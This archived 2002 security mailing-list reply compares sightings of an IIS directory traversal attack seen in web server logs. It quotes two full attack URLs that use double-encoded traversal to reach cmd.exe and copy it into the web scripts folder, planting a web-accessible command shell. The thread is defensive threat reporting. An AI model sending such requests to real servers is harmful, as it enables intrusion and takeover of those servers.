[Dshield] Re: New IIS directory traversal worm, or just a tool sig?

Preston G. Simpson preston.simpson at sfrlaw.com
Tue Nov 5 15:16:46 GMT 2002


James C Slora wrote:

> http://ww.tk.gov/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+
> copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\scripts.exe
> 
> Anyone else seen this?

	I've seen something similar:

206.203.46.237 - GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/
c+copy+c:\\winnt\\system32\\cmd.exe+c:\\inetpub\\scripts\\script.exe

	I got the first one of these (all from different addresses)
on or about 30 October. I've seen 13 to date, outnumbering the more
usual garden variety directory traversals I've seen.




More information about the list mailing list